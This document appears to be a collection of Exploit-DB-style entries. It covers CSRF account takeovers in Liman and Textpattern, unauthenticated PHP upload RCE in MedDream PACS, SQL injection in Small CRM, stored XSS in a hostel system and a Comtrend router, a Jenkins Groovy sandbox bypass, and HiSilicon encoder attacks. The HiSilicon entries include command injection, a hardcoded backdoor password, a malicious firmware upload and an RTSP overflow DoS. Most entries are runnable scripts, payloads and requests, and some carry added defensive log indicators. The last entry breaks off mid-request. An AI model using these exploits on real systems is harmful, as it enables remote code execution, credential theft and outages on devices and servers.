
  1. # Exploit Title: Liman 0.7 - Cross-Site Request Forgery (Change Password) # Date: 2020-10-07 # Exploit Author: George Tsimpidas # Software Link : https://github.com/salihciftci/liman/releases/tag/v0.7 # Version: 0.7 # Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver) # Category: Webapp Description: There is no CSRF protection in the Liman application; with a little help from social engineering (such as sending a link via email/chat) an attacker may force the victim to click on a malicious link, with the purpose of manipulating their current account information or changing their password entirely. Vulnerable Endpoints : http://127.0.0.1:5000/settings/profile http://127.0.0.1:5000/settings/password Proof of Concept Download the application, make an account and log in to the panel at http://127.0.0.1:5000 (expose the Docker port on 5000). Save these .html files and send them to the victim (the victim must be logged in in the browser). The crafted values will be added. Note that the password form also submits a `password` (current password) field with a fixed value, so that PoC only succeeds if the endpoint does not verify the current password or the attacker already knows it. Account Information CSRF : <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1:5000/settings/profile" method="POST"> <input type="hidden" name="username" value="betatest" /> <input type="hidden" name="email" value="test@gmail.com" /> <input type="submit" value="TakeOver Account Settings" /> </body> </html> Password Change CSRF : <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1:5000/settings/password" method="POST"> <input type="hidden" name="password" value="takeover" /> <input type="hidden" name="newPassword" value="takeover" /> <input type="hidden" name="confirmPassword" value="takeover" /> <input type="submit" value="Password TakeOver" /> </body> </html>
  #!/usr/bin/python
#
# Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)
# Exploit Author: bzyo
# Twitter: @bzyo_
# Date: 10-10-2020
# Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/
# Vendor Homepage: https://www.softneta.com
# Version: 6.8.3.751
# Tested On: Windows 2016
#
#
# Update to EB 48853 < AUTHENTICATION WAS NOT NEEDED LOLZ
#
##PoC##
#
# 1. create one line php shell to call commands
# 2. run script on attacking machine
# 3. enter parameters; IP, filename, command
#
#
# root@kali:~# python meddream.py
# Enter IP Address: 192.168.0.223
# Enter payload filename + .php: cmd.php
# Enter command: whoami
# 170759
# <pre>nt authority\system
# </pre>
# http://192.168.0.223/Pacs/upload/20201010-170759--cmd.php?cmd=whoami
# 404
# 404
# 404
# 404
# 404
# 404
# 404
# 404
# 404
#
#
# Reviewer notes (defensive reading of the PoC below):
# - One unauthenticated multipart POST to /Pacs/uploadImage.php whose 'uploadfile'
#   part carries a .php file, followed by GETs under /Pacs/upload/ for names of the
#   form <YYYYMMDD>-<HHMMSS>--<filename> with a ?cmd= query string.
# - Those two request shapes are the indicators to look for in web-server logs:
#   a .php filename in an upload to uploadImage.php, and ?cmd= requests under
#   /Pacs/upload/.
# - Python 2 code (raw_input, print statements); the urllib2, sys and time imports
#   are unused.
#
from urllib2 import urlopen
import requests
import sys
import time
from datetime import datetime, timedelta

# Interactive inputs: target host, local file to upload, command to append as ?cmd=
ip_addr = raw_input("Enter IP Address: ")
user_file = raw_input("Enter payload filename + .php: ")
cmd = raw_input("Enter command: ")

URL= 'http://' + ip_addr + '/Pacs/uploadImage.php'

def main():
    """Upload the file, then probe the expected stored path for a few candidate
    timestamps around the local clock.

    The stored name embeds the server-side upload time, which the client never
    learns from the response (``site`` is not inspected), so the candidates are
    derived from ``datetime.now()`` on the attacking host; a clock skew larger
    than the window below simply yields "404" for every candidate.
    """
    session = requests.Session()
    # Multipart body: two plain form fields ('actionvalue', 'action') and the file
    # part declared as application/x-php. No credentials are sent. The file handle
    # opened here is never closed.
    files = [
        ('actionvalue', (None, 'Attach', None)),
        ('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')),
        ('action', (None, 'Attach', None)),
    ]
    site = session.post(URL, files=files)
    # Date part of the stored name (YYYYMMDD), taken from the local clock.
    today = datetime.today()
    upload_date = today.strftime("%Y%m%d")
    less = 1
    now1 = datetime.now()
    up_time1 = now1.strftime("%H%M%S")
    print(up_time1)
    #varying time checks +/-
    # Candidate HHMMSS values: the current second, the preceding seconds, then
    # a couple of seconds after it.
    now2 = now1 - timedelta(seconds=less)
    up_time2 = now2.strftime("%H%M%S")
    now3 = now2 - timedelta(seconds=less)
    up_time3 = now3.strftime("%H%M%S")
    now4 = now3 - timedelta(seconds=less)
    up_time4 = now4.strftime("%H%M%S")
    now5 = now4 - timedelta(seconds=less)
    up_time5 = now5.strftime("%H%M%S")
    now6 = now5 - timedelta(seconds=less)
    up_time6 = now6.strftime("%H%M%S")
    now7 = now6 - timedelta(seconds=less)
    up_time7 = now7.strftime("%H%M%S")
    now8 = now1 + timedelta(seconds=less)
    up_time8 = now8.strftime("%H%M%S")
    now9 = now8 + timedelta(seconds=less)
    up_time9 = now8.strftime("%H%M%S")
    now10 = now1 + timedelta(seconds=less)
    up_time10 = now9.strftime("%H%M%S")
    up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10]
    # Request each candidate URL. A 200 prints the body and URL; any other status
    # is reported as "404" regardless of the actual code.
    for i in up_time_array:
        r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd)
        if r.status_code == 200:
            print r.content
            print r.url
        else:
            print ("404")

if __name__ == '__main__':
    main()
  3. # Exploit Title: Small CRM 2.0 - 'email' SQL Injection # Google Dork: N/A # Date: 2020-10-10 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/small-crm-php/ # Version: V2.0 # Tested on: Kali Linux # CVE : N/A ========== Vulnerable Code ========== mysqli_query $row1 = mysqli_query($con, "select email,password from user where email='" . $_POST['email'] . "'"); // dbconnection.php ========== Post Request ==================== POST /crm/forgot-password.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: localhost/crm/forgot-password.php Content-Type: application/x-www-form-urlencoded Content-Length: 20 Connection: close Cookie: __test=ec283e73906679549573af64209a5d5b; PHPSESSID=4d272f5938b3ec9c60bb45c4d7b44497 Upgrade-Insecure-Requests: 1 email=test@test.com&submit= ============= Vulnerable Parameter =============== email (POST) ============= Payload ========================= ' AND (SELECT 1543 FROM (SELECT(SLEEP(5)))gSRd) AND 'PCOX'='PCOX
  #!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - RCE via unauthenticated command injection
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24217
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
#
# Reviewer notes (defensive reading):
# - The whole PoC is one multipart POST to the device's web root with a part named
#   'upgrade' whose *filename* is 'logo;<command>;.png' (see the curl -F line); the
#   command travels in the filename field, not in the body.
# - Log/WAF indicator: an 'upgrade' upload whose filename contains ';' characters.
# - "SUCCESS" below only means curl exited 0, i.e. the HTTP exchange completed;
#   nothing in the response is checked.
# - $1 and $2 are expanded unquoted into the URL and the filename; no validation.

# Exactly two arguments: target (host[:port]) and the command string.
if [ "$#" -ne 2 ]
then
  echo "Usage: $0 <server>[:<port>] <command>"
  exit 1
fi

printf "executing the command... "
# -s silences progress; -F builds the multipart form with the crafted filename.
if curl -sF "upgrade=;filename=\"logo;$2;.png\"" http://$1 >/dev/null
then
  echo "SUCCESS: remote command executed"
else
  # $? here is curl's exit status from the if-condition.
  echo "ERROR: $?"
fi
  #!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - full admin access via backdoor password
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24215
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
#
# Reviewer notes (defensive reading):
# - One GET to http://<server>/get_sys with HTTP basic auth using the fixed
#   credential on the --user argument (the "backdoor password" of the title); the
#   response contains the configured admin password between <html_password> tags,
#   which grep extracts.
# - Indicators: basic-auth requests to /get_sys from unexpected sources; the fixed
#   credential appears base64-encoded in the Authorization header, which makes a
#   precise signature for proxies/IDS that can inspect the request.
# - The script prints the recovered password to the terminal in clear text.

# Exactly one argument: target host[:port].
if [ "$#" -ne 1 ]
then
  echo "Usage: $0 <server>[:<port>]"
  exit 1
fi

printf "retrieving the password... "
# grep -oP with lookbehind/lookahead keeps only the text inside <html_password>...</html_password>.
password=$(curl -s --user admin:neworange88888888 http://$1/get_sys | \
  grep -oP '(?<=<html_password>).*?(?=</html_password>)')
# Without 'set -o pipefail' this is grep's exit status, not curl's: grep returns 1
# when the tag is absent even if curl itself succeeded, so the "curl returned"
# message below can be misleading.
ret=$?
if [ "$ret" -eq 0 ]
then
  echo "the password is '$password'"
  echo "navigate to http://$1 and log into the admin interface with user 'admin' and password '$password'"
else
  echo "ERROR: curl returned $ret"
fi
  #!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24217
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
#
# Reviewer notes (defensive reading):
# - Builds uk.rar (rar -ma4) containing uk.txt with the command text, then POSTs it
#   as the 'upgrade' multipart field to the device root without any authentication;
#   per the title this is the firmware-upgrade handler (inferred, not verified here).
# - Indicators: unauthenticated POSTs to / carrying an 'upgrade' part with a RAR
#   archive; on the host running the script, transient uk.txt / uk.rar in the CWD.
# - uk.rar is removed only on the success path; on a curl failure it is left behind.
# - As in the companion command-injection PoC, "SUCCESS" means the upload request
#   completed, not that the device processed it.

# Exactly two arguments: target (host[:port]) and the command string.
if [ "$#" -ne 2 ]
then
  echo "Usage: $0 <server>[:<port>] <command>"
  exit 1
fi

printf "creating uk.rar... "
echo "$2" > uk.txt
# Requires the 'rar' binary on PATH; -ma4 selects RAR4 format.
rar a -ma4 uk.rar uk.txt >/dev/null 2>&1 || { echo "ERROR: rar failed. Is it installed?"; exit 2; }
echo "done"
rm uk.txt

printf "uploading the RAR file... "
# -F 'upgrade=@uk.rar' attaches the archive as the 'upgrade' form field.
if curl -s -F 'upgrade=@uk.rar' http://$1 >/dev/null
then
  echo "SUCCESS: remote command executed"
  rm uk.rar
else
  echo "ERROR: $?"
fi
  7. # Exploit Title: PHPGurukul hostel-management-system 2.1 allows XSS via Guardian Name, Guardian Relation, Guardian Contact no, Address, City # Google Dork: N/A # Date: 2020-10-08 # Exploit Author: Kokn3t # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/hostel-management-system # Version: V 2.1 # Tested on: Windows 10, Kali 2020.1 # CVE : CVE-2020-25270 ######## Attack Vector ######## Install Hostel Management System V 2.1 1) User Module Log in as a user, go to "Book Hostel" (http://localhost/hostel/book-hostel.php) and start booking. Add the malicious script in these fields - "<script>alert('XSS');</script>" i. Guardian Name ii. Guardian Relation iii. Guardian Contact no iv. Address v. City After that you will get the prompt "Student Successfully register", and after pressing "See All" the XSS will be triggered. 2) Admin Module Log in as Admin, go to "Management Students" and "View Full details" of the booked student's record; the XSS will be triggered there as well.
  8. # Exploit Title: Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in # Date: 8th October 2020 # Exploit Author: dmw0ng # Vendor Homepage: https://www.jenkins.io # Software Link: http://archives.jenkins-ci.org/windows/jenkins-2.63.zip # Version: Jenkins 2.63 # Tested on: Ubuntu 18.04 / 20.04 # CVE : CVE-2019-1003030 GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x { public x(){ "ping -c 1 xx.xx.xx.xx".execute() } } HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0 Connection: close Upgrade-Insecure-Requests: 1 URL Encoding the following for RCE ```public class x { public x(){ "ping -c 1 xx.xx.xx.xx".execute() } } ``` to %70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d
  #!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - unauthenticated RTSP buffer overflow (DoS)
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24214
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
#
# Reviewer notes (defensive reading):
# - Sends a single RTSP OPTIONS request whose CSeq header is 3000 '0' characters
#   (built by the printf/brace-expansion below) through telnet, then re-probes with
#   curl to see whether the RTSP service still answers.
# - Indicators: an RTSP request line 'OPTIONS /0 RTSP/1.0' followed by an abnormally
#   long CSeq header, and an RTSP service that stops answering right after it.
# - Both probes are 'timeout 2 curl -s rtsp://...' and any non-zero exit is read as
#   "server is down", so a slow, filtered or rate-limited target also reports SUCCESS.

# Exactly two arguments: server and RTSP port.
if [ "$#" -ne 2 ]
then
  echo "usage: $0 <server> <RTSP port>"
  exit 1
fi

server=$1
port=$2

printf "checking the target... "
# Pre-check: abort unless curl can complete an RTSP exchange within 2 seconds.
timeout 2 curl -s rtsp://$server:$port \
  || { echo "ERROR: no RTSP server found at $server:$port"; exit 2; }
printf "RTSP server detected\n"

# "0%0.s" prints a literal 0 and nothing of the argument; with 3000 arguments the
# format is reused 3000 times, giving a 3000-character string.
cseq=$(printf "0%0.s" {1..3000})

printf "sending the payload... "
# telnet output is discarded; the script does not read the server's reply.
printf "OPTIONS /0 RTSP/1.0\nCSeq: %s\n\n" $cseq | telnet $server $port >/dev/null 2>&1
printf "done\n"

sleep 1

printf "checking the target again... "
if timeout 2 curl -s rtsp://$server:$port
then
  echo "ERROR: the RTSP server still seems to be running :("
else
  echo "SUCCESS: the server is down"
fi
  #!/usr/bin/env python3
# -*- coding: utf-8 -*-

"""
Exploit Title: Persistent XSS on Comtrend AR-5387un router
Date: 19/10/2020
Exploit Author: OscarAkaElvis
Vendor Homepage: https://www.comtrend.com/
Version: Comtrend AR-5387un router
Tested on: Software/Firmware version A731-410JAZ-C04_R02.A2pD035g.d23i
CVE: CVE-2018-8062

Disclosure timeline:
08/03/2018: Vulnerability was discovered
10/03/2018: Reported to Mitre (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8062)
11/03/2018: Mitre answered, CVE number reserved
11/03/2018: Reported to Comtrend as part of responsible disclosure, they never answered
16/10/2020: Two years later, reported again to Comtrend and public disclosure (https://twitter.com/OscarAkaElvis/status/1317004119509471233)
18/10/2020: Exploit creation
19/10/2020: Exploit sent to exploit-db

Exploitation explanation:
To exploit this vulnerability, once logged into the router, a WAN service must be created
Click on "Advanced Setup", "WAN Service". "Add button", "Next"
Then insert the payload into the "Enter Service Description" field.
This was used for the PoC <script>alert('xss');</script>
Then click on "Next" four times to go on through the steps and finally click on "Apply/Save"
The result of the XSS will be displayed and triggered on the WAN services page

This exploit automates the entire process, bypassing the CSRF protection and allowing a custom XSS payload to be set

Happy hacking :)
OscarAkaElvis - https://twitter.com/OscarAkaElvis
"""

# Dependencies and libraries
import requests
from requests.auth import HTTPBasicAuth
import re
from sys import argv, exit
import argparse
from os import path
from time import sleep


class Exploit(object):
    """Drive the router's WAN-service wizard over HTTP to store an XSS payload.

    Flow (see ``main``): argument parsing, a fingerprint of the target via its
    WWW-Authenticate header, a basic-auth login check, then eight GET requests
    that mirror the browser wizard. Each response's ``sessionKey`` is harvested
    (``get_sessionKey``) and replayed as a query parameter on the next request,
    together with a Referer that reproduces the previous wizard URL; this is the
    anti-CSRF token the step1 message refers to. The payload itself travels as
    the ``serviceName`` parameter in ``step4``.

    Defensive reading (inferred from the requests below, not verified against
    firmware): the wizard performs state changes over GET with the token in the
    URL, and the token is recoverable from any authenticated page body - both
    of which the replay relies on. Every attribute is class-level, so all
    instances share one ``requests.Session``.
    """

    # Global class vars
    session = requests.Session()
    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Safari/537.36"
    # Filled in by check_params from CLI arguments or the defaults below.
    ip = None
    username = None
    password = None
    payload = None
    default_ip = "192.168.1.1"
    default_username = "admin"
    default_password = "admin"
    default_payload = "<script>alert('xss');</script>"
    exploit_version = "1.0"
    # current_sessionkey: token from the most recent response; referer_sessionkey:
    # the one before it, used to rebuild the previous wizard URL as Referer.
    current_sessionkey = None
    referer_sessionkey = None
    # Evaluated at import time from argv[0].
    script_name = path.basename(argv[0])
    description_text = 'CVE-2018-8062 exploit by OscarAkaElvis, Persistent XSS on Comtrend AR-5387un router'
    epilog_text = 'Examples:\n python3 ' + script_name + ' -i 192.168.0.150\n python3 ' + script_name + ' -u admin -p mySecureRouterP@ss\n python3 ' + script_name + ' -i 10.0.0.1 -u admin -p mySecureRouterP@ss -x \'<script>evil_js_stuff</script>\''

    def start_msg(self):
        """Print the start banner and pause briefly."""
        print("[*] Starting CVE-2018-8062 exploit...")
        sleep(0.5)

    def check_params(self, arguments):
        """Parse ``arguments`` (an argv-style list) and populate ip/username/password/payload.

        Every option is optional; a missing one falls back to the class default
        and prints a warning. Note that ``-v`` is wired to ``print_version()``,
        which is evaluated eagerly here while the parser is being built.
        """
        parser = argparse.ArgumentParser(description=self.description_text, formatter_class=argparse.RawDescriptionHelpFormatter, epilog=self.epilog_text)
        parser.add_argument('-i', '--ip', dest='ip', required=False, help="set router's ip", metavar='IP')
        parser.add_argument('-u', '--username', dest='username', required=False, help="set user to login on router", metavar='USERNAME')
        parser.add_argument('-p', '--password', dest='password', required=False, help="set password to login on router", metavar='PASSWORD')
        parser.add_argument('-x', '--xss-payload', dest='payload', required=False, help="set xss payload", metavar='PAYLOAD')
        parser.add_argument('-v', '--version', action='version', version=self.print_version(), help="show exploit's version number and exit")
        args = parser.parse_args(arguments)

        self.start_msg()
        print("[*] Launch the exploit using -h argument to check all the available options")
        print()

        if not args.ip:
            self.ip = self.default_ip
            print("[!] Warning, no ip set, default will be used: " + str(self.ip))
        else:
            self.ip = args.ip

        if not args.username:
            self.username = self.default_username
            print("[!] Warning, no username set, default will be used: " + str(self.username))
        else:
            self.username = args.username

        if not args.password:
            self.password = self.default_password
            print("[!] Warning, no password set, default will be used: " + str(self.password))
        else:
            self.password = args.password

        if not args.payload:
            self.payload = self.default_payload
            print("[!] Warning, no XSS payload set, PoC default will be used: " + str(self.payload))
        else:
            self.password = args.password

    def print_version(self):
        """Return the version string ('v<exploit_version>'), printing a blank line first."""
        print()
        return 'v{}'.format(self.exploit_version)

    def check_router(self):
        """Fingerprint the target: an unauthenticated GET to / must answer with a
        WWW-Authenticate header mentioning 'Broadband Router', otherwise exit(1).

        Connection failures are caught and also end the program with exit(1).
        """
        try:
            print()
            print("[*] Trying to detect router...")
            headers = {"User-Agent": self.user_agent}
            response = self.session.get("http://" + str(self.ip) + "/", headers=headers)
            # Match runs over the stringified headers dict, not a single header value.
            if re.match(r'.*WWW-Authenticate.*Broadband Router.*', str(response.headers)):
                print("[+] Comtrend router detected successfully")
            else:
                print()
                print("[-] It seems the target is not a Comtrend router")
                print("[*] Exiting...")
                exit(1)
        except (TimeoutError, ConnectionError, requests.exceptions.ConnectionError):
            print()
            print("[-] Can't connect to the router")
            print("[*] Exiting...")
            exit(1)

    def check_login(self):
        """Verify the credentials with one basic-auth GET to /; any status other
        than 401 is treated as a successful login, 401 ends the program."""
        print()
        print("[*] Trying to login...")
        headers = {"User-Agent": self.user_agent}
        response = self.session.get("http://" + str(self.ip) + "/", headers=headers, auth=HTTPBasicAuth(self.username, self.password))
        if response.status_code != 401:
            print("[+] Login successfully!")
            sleep(1)
        else:
            print()
            print("[-] Can't login into the router. Check your creds!")
            print("[*] Exiting...")
            exit(1)

    def get_sessionKey(self, response_text):
        """Extract the numeric sessionKey (the anti-CSRF token) from a response body.

        Two patterns are tried: a plain ``sessionKey=<digits>`` occurrence and a
        backslash-escaped-quote variant (second regex; presumably the form used
        inside inline script). Returns the digits as a string, or None when
        neither matches. Callers concatenate the result into strings, so a None
        surfaces there as a TypeError rather than being handled here.
        """
        sessionKey = re.search(r'.*sessionKey=([0-9]+).*', str(response_text))
        if sessionKey is not None:
            sessionKey = sessionKey.group(1)
        else:
            sessionKey = re.search(r'.*sessionKey=\\\'([0-9]+).*', str(response_text), re.MULTILINE)
            if sessionKey is not None:
                sessionKey = sessionKey.group(1)
        return sessionKey

    def step1(self):
        """Fetch /wancfg.cmd (the WAN service list) and record its sessionKey."""
        print()
        print("[*] Performing step 1/8. Getting initial sessionKey to bypass CSRF protection...")
        headers = {"User-Agent": self.user_agent}
        response = self.session.get("http://" + str(self.ip) + "/wancfg.cmd", headers=headers, auth=HTTPBasicAuth(self.username, self.password))
        self.current_sessionkey = self.get_sessionKey(response.content)
        print("[+] Success! Initial sessionKey: " + self.current_sessionkey)
        sleep(1)

    def step2(self):
        """Wizard page 1 (/wanifc.cmd, serviceId=0); rotate the sessionKey pair."""
        print()
        print("[*] Performing step 2/8...")
        paramsGet = {"sessionKey": self.current_sessionkey, "serviceId": "0"}
        headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wancfg.cmd"}
        response = self.session.get("http://" + str(self.ip) + "/wanifc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
        # Previous key becomes the Referer key; new key is read from this response.
        self.referer_sessionkey = self.current_sessionkey
        self.current_sessionkey = self.get_sessionKey(response.content)
        sleep(1)

    def step3(self):
        """Wizard page 2 (/wansrvc.cmd) selecting the fixed L2 interface atm0/(0_8_35)."""
        print()
        print("[*] Performing step 3/8...")
        paramsGet = {"sessionKey": self.current_sessionkey, "wanL2IfName": "atm0/(0_8_35)"}
        headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wanifc.cmd?serviceId=0&sessionKey=" + self.referer_sessionkey}
        response = self.session.get("http://" + str(self.ip) + "/wansrvc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
        self.referer_sessionkey = self.current_sessionkey
        self.current_sessionkey = self.get_sessionKey(response.content)
        sleep(1)

    def step4(self):
        """Wizard page 3 (/pppoe.cgi). This is where the payload is submitted, as
        the ``serviceName`` query parameter (the "Enter Service Description" field)."""
        print()
        print("[*] Performing step 4/8...")
        paramsGet = {"vlanMuxPr": "-1", "sessionKey": self.current_sessionkey, "vlanMuxId": "-1", "ntwkPrtcl": "0", "enVlanMux": "1", "enblEnetWan": "0", "serviceName": self.payload}
        headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wansrvc.cmd?wanL2IfName=atm0/(0_8_35)&sessionKey=" + self.referer_sessionkey}
        response = self.session.get("http://" + str(self.ip) + "/pppoe.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
        self.referer_sessionkey = self.current_sessionkey
        self.current_sessionkey = self.get_sessionKey(response.content)
        sleep(1)

    def step5(self):
        """Wizard page 4 (/ifcgateway.cgi) with all PPP options left at zero/empty.

        The Referer reproduces the previous URL but with the literal
        serviceName 'pppoe_0_8_35' rather than the payload.
        """
        print()
        print("[*] Performing step 5/8...")
        paramsGet = {"useStaticIpAddress": "0", "pppLocalIpAddress": "0.0.0.0", "sessionKey": self.current_sessionkey, "enblIgmp": "0", "enblFullcone": "0", "pppTimeOut": "0", "pppAuthErrorRetry": "0", "pppServerName": "", "enblPppDebug": "0", "pppPassword": "", "enblNat": "0", "enblOnDemand": "0", "pppUserName": "", "pppIpExtension": "0", "enblFirewall": "0", "pppAuthMethod": "0", "pppToBridge": "0"}
        headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/pppoe.cgi?enblEnetWan=0&ntwkPrtcl=0&enVlanMux=1&vlanMuxId=-1&vlanMuxPr=-1&serviceName=pppoe_0_8_35&sessionKey=" + self.referer_sessionkey}
        response = self.session.get("http://" + str(self.ip) + "/ifcgateway.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
        self.referer_sessionkey = self.current_sessionkey
        self.current_sessionkey = self.get_sessionKey(response.content)
        sleep(1)

    def step6(self):
        """Wizard page 5 (/ifcdns.cgi) with default gateway ppp0.1."""
        print()
        print("[*] Performing step 6/8...")
        paramsGet = {"sessionKey": self.current_sessionkey, "defaultGatewayList": "ppp0.1"}
        headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcgateway.cgi?pppUserName=&pppPassword=&enblOnDemand=0&pppTimeOut=0&useStaticIpAddress=0&pppLocalIpAddress=0.0.0.0&pppIpExtension=0&enblNat=0&enblFirewall=0&enblFullcone=0&pppAuthMethod=0&pppServerName=&pppAuthErrorRetry=0&enblPppDebug=0&pppToBridge=0&enblIgmp=0&sessionKey=" + self.referer_sessionkey}
        response = self.session.get("http://" + str(self.ip) + "/ifcdns.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
        self.referer_sessionkey = self.current_sessionkey
        self.current_sessionkey = self.get_sessionKey(response.content)
        sleep(1)

    def step7(self):
        """Wizard page 6 (/ntwksum2.cgi, the summary page) with fixed DNS servers."""
        print()
        print("[*] Performing step 7/8...")
        paramsGet = {"dnsRefresh": "1", "sessionKey": self.current_sessionkey, "dnsPrimary": "1.1.1.1", "dnsSecondary": "8.8.8.8"}
        headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcdns.cgi?defaultGatewayList=ppp0.1&sessionKey=" + self.referer_sessionkey}
        response = self.session.get("http://" + str(self.ip) + "/ntwksum2.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
        self.referer_sessionkey = self.current_sessionkey
        self.current_sessionkey = self.get_sessionKey(response.content)
        sleep(1)

    def final_step8(self):
        """Apply/Save: GET /wancfg.cmd?action=add with the last sessionKey.

        The response is not checked; the success message is printed
        unconditionally.
        """
        print()
        print("[*] Performing final step 8/8. Deploying XSS payload...")
        paramsGet = {"sessionKey": self.current_sessionkey, "action": "add"}
        headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ntwksum2.cgi?dnsPrimary=1.1.1.1&dnsSecondary=8.8.8.8&dnsRefresh=1&sessionKey=" + self.referer_sessionkey}
        self.session.get("http://" + str(self.ip) + "/wancfg.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
        print()
        print("[+] XSS payload deployed successfully")
        print("[+] Happy hacking :) . Author: OscarAkaElvis")

    @staticmethod
    def main(self, arguments):
        """Run the whole sequence on the ``Exploit`` instance passed as ``self``
        (a staticmethod, so the caller supplies the instance explicitly) and exit(0)."""
        self.check_params(arguments)
        self.check_router()
        self.check_login()
        self.step1()
        self.step2()
        self.step3()
        self.step4()
        self.step5()
        self.step6()
        self.step7()
        self.final_step8()
        exit(0)


if __name__ == '__main__':
    ImportObject = Exploit()
    ImportObject.main(ImportObject, argv[1:])
  11. # Exploit Title: Textpattern CMS 4.6.2 - Cross-site Request Forgery # Exploit Author: Alperen Ergel # Contact: @alpren_ae # Software Homepage: https://textpattern.com/ # Version : 4.6.2 # Tested on: windows 10 / xampp # Category: WebApp # Google Dork: intext:"Published with Textpattern CMS" # Date: 2020-10-29 ######## Description ######## # # 1-) Log in to the administrator page # # 2-) Go to admin > prefs > site # # 3-) All inputs are vulnerable to CSRF # # Note that the request and the PoC form below carry a fixed `_txp_token` value; the claim therefore rests on that token not being validated or rotated server-side, which the report does not demonstrate. # ######## Proof of Concept ######## ========>>> REQUEST <<<========= POST /textpattern/textpattern/index.php?event=prefs HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/textpattern/textpattern/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 1806 Connection: close Cookie: txp_login=localhost%2Ca170e235c4f2f59bb1300272c470807d; txp_login_public=a834cbdc8blocalhost; __atuvc=1%7C40 Upgrade-Insecure-Requests: 1 Submit=Save&sitename=victim+site&siteurl=victimurl.com&site_slogan=victimslogan&production_status=testing&timezone_key=Europe%2FBerlin&auto_dst=0& 